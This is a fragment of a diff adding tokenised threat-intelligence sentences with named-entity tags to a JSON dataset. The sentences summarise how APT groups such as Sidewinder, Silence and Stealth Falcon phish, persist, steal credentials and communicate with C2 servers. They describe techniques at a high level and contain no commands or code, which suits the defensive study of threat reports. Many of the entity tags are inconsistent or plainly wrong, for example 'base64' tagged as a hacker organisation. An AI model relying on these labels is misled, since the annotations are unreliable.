"B-SamFile" + ] + }, + { + "tokens": [ + "Sidewinder", + "has", + "used", + "the", + "ActiveXObject", + "utility", + "to", + "create", + "OLE", + "objects", + "to", + "obtain", + "execution", + "through", + "Internet", + "Explorer." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Sidewinder", + "has", + "used", + "base64", + "encoding", + "and", + "ECDH-P256", + "encryption", + "for", + "payloads." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-HackOrg", + "O", + "O", + "B-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Sidewinder", + "has", + "exploited", + "vulnerabilities", + "to", + "gain", + "execution", + "including", + "CVE-2017-11882", + "and", + "CVE-2020-0674." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "B-Features" + ] + }, + { + "tokens": [ + "Sidewinder", + "has", + "used", + "malware", + "to", + "collect", + "information", + "on", + "files", + "and", + "directories." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Sidewinder", + "has", + "used", + "LNK", + "files", + "to", + "download", + "remote", + "files", + "to", + "the", + "victim's", + "network." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-SamFile", + "I-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Sidewinder", + "has", + "used", + "JavaScript", + "to", + "drop", + "and", + "execute", + "malware", + "loaders." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Sidewinder", + "has", + "collected", + "stolen", + "files", + "in", + "a", + "temporary", + "folder", + "in", + "preparation", + "for", + "exfiltration." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Purp", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Sidewinder", + "has", + "lured", + "targets", + "to", + "click", + "on", + "malicious", + "files", + "to", + "gain", + "execution", + "in", + "the", + "target", + "environment." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "I-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Sidewinder", + "has", + "lured", + "targets", + "to", + "click", + "on", + "malicious", + "links", + "to", + "gain", + "execution", + "in", + "the", + "target", + "environment." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Sidewinder", + "has", + "named", + "malicious", + "files", + "<code>rekeywiz.exe</code>", + "to", + "match", + "the", + "name", + "of", + "a", + "legitimate", + "Windows", + "executable." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-SamFile", + "I-SamFile", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Sidewinder", + "has", + "used", + "<code>mshta.exe</code>", + "to", + "execute", + "malicious", + "payloads." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Sidewinder", + "has", + "used", + "PowerShell", + "to", + "drop", + "and", + "execute", + "malware", + "loaders." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Sidewinder", + "has", + "used", + "tools", + "to", + "identify", + "running", + "processes", + "on", + "the", + "victim's", + "machine." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Sidewinder", + "has", + "added", + "paths", + "to", + "executables", + "in", + "the", + "Registry", + "to", + "establish", + "persistence." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Sidewinder", + "has", + "used", + "the", + "Windows", + "service", + "<code>winmgmts:\\\\.\\root\\SecurityCenter2</code>", + "to", + "check", + "installed", + "antivirus", + "products." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Sidewinder", + "has", + "used", + "tools", + "to", + "enumerate", + "software", + "installed", + "on", + "an", + "infected", + "host." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Sidewinder", + "has", + "sent", + "e-mails", + "with", + "malicious", + "attachments", + "often", + "crafted", + "for", + "specific", + "targets." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Sidewinder", + "has", + "sent", + "e-mails", + "with", + "malicious", + "attachments", + "that", + "lead", + "victims", + "to", + "credential", + "harvesting", + "websites." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Sidewinder", + "has", + "sent", + "e-mails", + "with", + "malicious", + "links", + "often", + "crafted", + "for", + "specific", + "targets." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Sidewinder", + "has", + "sent", + "e-mails", + "with", + "malicious", + "links", + "to", + "credential", + "harvesting", + "websites." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Sidewinder", + "has", + "used", + "tools", + "to", + "collect", + "the", + "computer", + "name,", + "OS", + "version,", + "installed", + "hotfixes,", + "as", + "well", + "as", + "information", + "regarding", + "the", + "memory", + "and", + "processor", + "on", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Sidewinder", + "has", + "used", + "malware", + "to", + "collect", + "information", + "on", + "network", + "interfaces,", + "including", + "the", + "MAC", + "address." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Sidewinder", + "has", + "used", + "tools", + "to", + "identify", + "the", + "user", + "of", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Sidewinder", + "has", + "used", + "tools", + "to", + "obtain", + "the", + "current", + "system", + "time." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "I-Purp", + "I-Purp", + "O" + ] + }, + { + "tokens": [ + "Sidewinder", + "has", + "used", + "VBScript", + "to", + "drop", + "and", + "execute", + "malware", + "loaders." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Sidewinder", + "has", + "used", + "HTTP", + "in", + "C2", + "communications." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Silence", + "has", + "used", + "a", + "valid", + "certificate", + "to", + "sign", + "their", + "primary", + "loader", + "Silence.Downloader", + "(aka", + "TrueBot)." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Silence", + "has", + "used", + "environment", + "variable", + "string", + "substitution", + "for", + "obfuscation." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Silence", + "has", + "weaponized", + "CHM", + "files", + "in", + "their", + "phishing", + "campaigns." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "Silence", + "has", + "used", + "ProxyBot,", + "which", + "allows", + "the", + "attacker", + "to", + "redirect", + "traffic", + "from", + "the", + "current", + "node", + "to", + "the", + "backconnect", + "server", + "via", + "Sock4\\Socks5." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Silence", + "has", + "deleted", + "artifacts,", + "including", + "scheduled", + "tasks,", + "communicates", + "files", + "from", + "the", + "C2", + "and", + "other", + "logs." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Silence", + "has", + "downloaded", + "additional", + "modules", + "and", + "malware", + "to", + "victim’s", + "machines." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Silence", + "has", + "used", + "JS", + "scripts." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "Silence", + "has", + "used", + "the", + "Farse6.1", + "utility", + "(based", + "on", + "Mimikatz)", + "to", + "extract", + "credentials", + "from", + "lsass.exe." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "B-Way", + "O", + "I-Purp", + "I-Purp", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Silence", + "attempts", + "to", + "get", + "users", + "to", + "launch", + "malicious", + "attachments", + "delivered", + "via", + "spearphishing", + "emails." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-SecTeam", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "Silence", + "has", + "named", + "its", + "backdoor", + "\"WINWORD.exe\"." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Silence", + "can", + "create,", + "delete,", + "or", + "modify", + "a", + "specified", + "Registry", + "key", + "or", + "value." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "B-Features", + "B-Features", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Silence", + "has", + "leveraged", + "the", + "Windows", + "API,", + "including", + "using", + "CreateProcess()", + "or", + "ShellExecute(),", + "to", + "perform", + "a", + "variety", + "of", + "tasks." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Silence", + "has", + "used", + "port", + "444", + "when", + "sending", + "data", + "about", + "the", + "system", + "from", + "the", + "client", + "to", + "the", + "server." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Silence", + "has", + "used", + "PowerShell", + "to", + "download", + "and", + "execute", + "payloads." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Silence", + "has", + "injected", + "a", + "DLL", + "library", + "containing", + "a", + "Trojan", + "into", + "the", + "fwmain32.exe", + "process." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "Silence", + "has", + "used", + "<code>HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run</code>,", + "<code>HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run</code>,", + "and", + "the", + "Startup", + "folder", + "to", + "establish", + "persistence." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "B-Way", + "B-Way", + "O", + "O", + "B-Way", + "B-SamFile", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Silence", + "has", + "used", + "RDP", + "for", + "lateral", + "movement." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Silence", + "has", + "used", + "Nmap", + "to", + "scan", + "the", + "corporate", + "network,", + "build", + "a", + "network", + "topology,", + "and", + "identify", + "vulnerable", + "hosts." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Silence", + "has", + "used", + "scheduled", + "tasks", + "to", + "stage", + "its", + "operation." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Silence", + "can", + "capture", + "victim", + "screen", + "activity." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Silence", + "has", + "used", + "Winexe", + "to", + "install", + "a", + "service", + "on", + "the", + "remote", + "system." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Silence", + "has", + "used", + "RAdmin,", + "a", + "remote", + "software", + "tool", + "used", + "to", + "remotely", + "control", + "workstations", + "and", + "ATMs." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Purp", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Silence", + "has", + "sent", + "emails", + "with", + "malicious", + "DOCX,", + "CHM,", + "LNK", + "and", + "ZIP", + "attachments." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "B-Way", + "O", + "O", + "B-Way", + "B-Way", + "B-Way", + "O", + "B-Tool", + "O" + ] + }, + { + "tokens": [ + "Silence", + "has", + "obtained", + "and", + "modified", + "versions", + "of", + "publicly-available", + "tools", + "like", + "Empire", + "and", + "PsExec." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Tool", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Silence", + "has", + "used", + "compromised", + "credentials", + "to", + "log", + "on", + "to", + "other", + "systems", + "and", + "escalate", + "privileges." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "I-Way", + "I-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Silence", + "has", + "been", + "observed", + "making", + "videos", + "of", + "victims", + "to", + "observe", + "bank", + "employees", + "day", + "to", + "day", + "activities." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Org", + "I-Org", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Silence", + "has", + "used", + "VBS", + "scripts." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "Silence", + "has", + "used", + "Windows", + "command-line", + "to", + "run", + "commands." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Silent", + "Librarian", + "has", + "obtained", + "free", + "Let's", + "Encrypt", + "SSL", + "certificates", + "for", + "use", + "on", + "their", + "phishing", + "pages." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "Silent", + "Librarian", + "has", + "acquired", + "domains", + "to", + "establish", + "credential", + "harvesting", + "pages,", + "often", + "spoofing", + "the", + "target", + "organization", + "and", + "using", + "free", + "top", + "level", + "domains", + ".TK,", + ".ML,", + ".GA,", + ".CF,", + "and", + ".GQ." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "Silent", + "Librarian", + "has", + "established", + "e-mail", + "accounts", + "to", + "receive", + "e-mails", + "forwarded", + "from", + "compromised", + "accounts." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Silent", + "Librarian", + "has", + "collected", + "e-mail", + "addresses", + "from", + "targeted", + "organizations", + "from", + "open", + "Internet", + "searches." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Silent", + "Librarian", + "has", + "exfiltrated", + "entire", + "mailboxes", + "from", + "compromised", + "accounts." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Silent", + "Librarian", + "has", + "set", + "up", + "auto", + "forwarding", + "rules", + "on", + "compromised", + "e-mail", + "accounts." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "Silent", + "Librarian", + "has", + "collected", + "lists", + "of", + "names", + "for", + "individuals", + "from", + "targeted", + "organizations." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Silent", + "Librarian", + "has", + "cloned", + "victim", + "organization", + "login", + "pages", + "and", + "staged", + "them", + "for", + "later", + "use", + "in", + "credential", + "harvesting", + "campaigns.", + "Silent", + "Librarian", + "has", + "also", + "made", + "use", + "of", + "a", + "variety", + "of", + "URL", + "shorteners", + "for", + "these", + "staged", + "websites." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Org", + "I-OffAct", + "O", + "I-HackOrg", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Silent", + "Librarian", + "has", + "used", + "collected", + "lists", + "of", + "names", + "and", + "e-mail", + "accounts", + "to", + "use", + "in", + "password", + "spraying", + "attacks", + "against", + "private", + "sector", + "targets." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "I-OffAct", + "I-OffAct", + "I-OffAct", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Silent", + "Librarian", + "has", + "searched", + "victim's", + "websites", + "to", + "identify", + "the", + "interests", + "and", + "academic", + "areas", + "of", + "targeted", + "individuals", + "and", + "to", + "scrape", + "source", + "code,", + "branding,", + "and", + "organizational", + "contact", + "information", + "for", + "phishing", + "pages." + ], + "ner_tags": [ + "I-SecTeam", + "I-SecTeam", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "Silent", + "Librarian", + "has", + "used", + "links", + "in", + "e-mails", + "to", + "direct", + "victims", + "to", + "credential", + "harvesting", + "websites", + "designed", + "to", + "appear", + "like", + "the", + "targeted", + "organization's", + "login", + "page." + ], + "ner_tags": [ + "I-HackOrg", + "B-HackOrg", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Silent", + "Librarian", + "has", + "obtained", + "free", + "and", + "publicly", + "available", + "tools", + "including", + "SingleFile", + "and", + "HTTrack", + "to", + "copy", + "login", + "pages", + "of", + "targeted", + "organizations." + ], + "ner_tags": [ + "I-SecTeam", + "I-SecTeam", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Silent", + "Librarian", + "has", + "used", + "compromised", + "credentials", + "to", + "obtain", + "unauthorized", + "access", + "to", + "online", + "accounts." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "I-Way", + "I-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SilverTerrier", + "uses", + "FTP", + "for", + "C2", + "communications." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SilverTerrier", + "targets", + "organizations", + "in", + "high", + "technology,", + "higher", + "education,", + "and", + "manufacturing", + "for", + "business", + "email", + "compromise", + "(BEC)", + "campaigns", + "with", + "the", + "goal", + "of", + "financial", + "theft." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "I-Idus", + "O", + "I-Idus", + "O", + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "B-Org", + "B-OffAct", + "O", + "O", + "O", + "O", + "I-Purp", + "O" + ] + }, + { + "tokens": [ + "SilverTerrier", + "uses", + "SMTP", + "for", + "C2", + "communications." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SilverTerrier", + "uses", + "HTTP", + "for", + "C2", + "communications." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Sowbug", + "extracted", + "documents", + "and", + "bundled", + "them", + "into", + "a", + "RAR", + "archive." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Sowbug", + "extracted", + "Word", + "documents", + "from", + "a", + "file", + "server", + "on", + "a", + "victim", + "network." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Tool", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Sowbug", + "identified", + "and", + "extracted", + "all", + "Word", + "documents", + "on", + "a", + "server", + "by", + "using", + "a", + "command", + "containing", + "*", + ".doc", + "and", + "*.docx.", + "The", + "actors", + "also", + "searched", + "for", + "documents", + "based", + "on", + "a", + "specific", + "date", + "range", + "and", + "attempted", + "to", + "identify", + "all", + "installed", + "software", + "on", + "a", + "victim." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "I-SamFile", + "I-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-SamFile", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Sowbug", + "has", + "used", + "keylogging", + "tools." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "Sowbug", + "named", + "its", + "tools", + "to", + "masquerade", + "as", + "Windows", + "or", + "Adobe", + "Reader", + "software,", + "such", + "as", + "by", + "using", + "the", + "file", + "name", + "adobecms.exe", + "and", + "the", + "directory", + "<code>CSIDL_APPDATA\\microsoft\\security</code>." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "Sowbug", + "listed", + "remote", + "shared", + "drives", + "that", + "were", + "accessible", + "from", + "a", + "victim." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Sowbug", + "has", + "used", + "credential", + "dumping", + "tools." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "I-Tool", + "O" + ] + }, + { + "tokens": [ + "Sowbug", + "obtained", + "OS", + "version", + "and", + "hardware", + "configuration", + "from", + "a", + "victim." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Sowbug", + "has", + "used", + "command", + "line", + "during", + "its", + "intrusions." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Stealth", + "Falcon", + "malware", + "uses", + "WMI", + "to", + "script", + "data", + "collection", + "and", + "command", + "execution", + "on", + "the", + "victim." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Stealth", + "Falcon", + "malware", + "gathers", + "passwords", + "from", + "multiple", + "sources,", + "including", + "Windows", + "Credential", + "Vault", + "and", + "Outlook." + ], + "ner_tags": [ + "B-Way", + "B-HackOrg", + "B-Tool", + "B-Features", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Stealth", + "Falcon", + "malware", + "gathers", + "passwords", + "from", + "multiple", + "sources,", + "including", + "Internet", + "Explorer,", + "Firefox,", + "and", + "Chrome." + ], + "ner_tags": [ + "B-Way", + "B-HackOrg", + "O", + "B-Features", + "B-HackOrg", + "O", + "O", + "O", + "O", + "I-Tool", + "O", + "B-Way", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Stealth", + "Falcon", + "malware", + "gathers", + "data", + "from", + "the", + "local", + "victim", + "system." + ], + "ner_tags": [ + "B-Way", + "B-HackOrg", + "O", + "B-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "After", + "data", + "is", + "collected", + "by", + "Stealth", + "Falcon", + "malware,", + "it", + "is", + "exfiltrated", + "over", + "the", + "existing", + "C2", + "channel." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Stealth", + "Falcon", + "malware", + "uses", + "PowerShell", + "commands", + "to", + "perform", + "various", + "functions,", + "including", + "gathering", + "system", + "information", + "via", + "WMI", + "and", + "executing", + "commands", + "from", + "its", + "C2", + "server." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "B-Tool", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Stealth", + "Falcon", + "malware", + "gathers", + "a", + "list", + "of", + "running", + "processes." + ], + "ner_tags": [ + "B-Way", + "I-Tool", + "I-Tool", + "B-Features", + "I-Features", + "I-Features", + "I-Features", + "O", + "O" + ] + }, + { + "tokens": [ + "Stealth", + "Falcon", + "malware", + "attempts", + "to", + "determine", + "the", + "installed", + "version", + "of", + ".NET", + "by", + "querying", + "the", + "Registry." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Stealth", + "Falcon", + "malware", + "creates", + "a", + "scheduled", + "task", + "entitled", + "“IE", + "Web", + "Cache”", + "to", + "execute", + "a", + "malicious", + "file", + "hourly." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Stealth", + "Falcon", + "malware", + "encrypts", + "C2", + "traffic", + "using", + "RC4", + "with", + "a", + "hard-coded", + "key." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Stealth", + "Falcon", + "malware", + "gathers", + "system", + "information", + "via", + "WMI,", + "including", 